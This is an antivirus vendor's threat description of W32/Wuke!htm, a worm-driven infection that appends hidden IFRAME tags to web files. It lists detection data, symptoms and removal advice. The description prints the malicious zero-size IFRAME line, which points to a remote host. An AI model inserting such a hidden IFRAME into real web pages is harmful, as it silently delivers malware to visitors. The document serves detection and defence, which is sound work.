Content

W32/Wuke!htm

Type
Virus
SubType
-
Discovery Date
12/12/2006
Length
Varies
Minimum DAT
4917 (12/12/2006)
Updated DAT
4972 (02/27/2007)
Minimum Engine
5.1.00
Description Added
12/12/2006
Description Modified
08/20/2007 4:48 AM (PT)
Risk Assessment
Corporate User
Low
Home User
Low

Tab Navigation

Characteristics

Infected web-based files contain an appended HTML IFRAME (inline-frame) tag which, if rendered, will dynamically download content from a remote web host.

The IFRAME tag in this variant points to the following URL:

  • http://softd.ppandora.com/[HIDDEN]

using the following syntax:

  • iframe src=http://softd.ppandora.com/[HIDDEN] width=0 height=0 /iframe

Symptoms

 - Increased size of .HTM; .HTML; .ASP and .ASPX files.
   - In the case of this variant, such files grew by 71 bytes.

 - Presence of IFRAME tags appended to files with aforementioned extensions.

 - Unexpected HTTP traffic
   - If an infected file is loaded and rendered in an application, such as a web browser, potentially unexpected HTTP traffic will occur on the network. The destination of such traffic would be to the URL mentioned in the characteristics section of this description.

Method of Infection

Infection occurs after a system has been infected with the W32/Wuke@MM worm.

Please view the W32/Wuke@MM description for more information on this threat.

Removal

AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

Variants

    N/A

All Information

Overview -

W32/Wuke@MM infects .HTM; .HTML; .ASP; and .ASPX files such that when they're opened and rendered they will download malicious content from remote web hosts.

Characteristics

Characteristics -

Infected web-based files contain an appended HTML IFRAME (inline-frame) tag which, if rendered, will dynamically download content from a remote web host.

The IFRAME tag in this variant points to the following URL:

  • http://softd.ppandora.com/[HIDDEN]

using the following syntax:

  • iframe src=http://softd.ppandora.com/[HIDDEN] width=0 height=0 /iframe

Symptoms

Symptoms -

 - Increased size of .HTM; .HTML; .ASP and .ASPX files.
   - In the case of this variant, such files grew by 71 bytes.

 - Presence of IFRAME tags appended to files with aforementioned extensions.

 - Unexpected HTTP traffic
   - If an infected file is loaded and rendered in an application, such as a web browser, potentially unexpected HTTP traffic will occur on the network. The destination of such traffic would be to the URL mentioned in the characteristics section of this description.

Method of Infection

Method of Infection -

Infection occurs after a system has been infected with the W32/Wuke@MM worm.

Please view the W32/Wuke@MM description for more information on this threat.

Removal -

Removal -

AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.

Additional Windows ME/XP removal considerations

Variants

Variants -

    N/A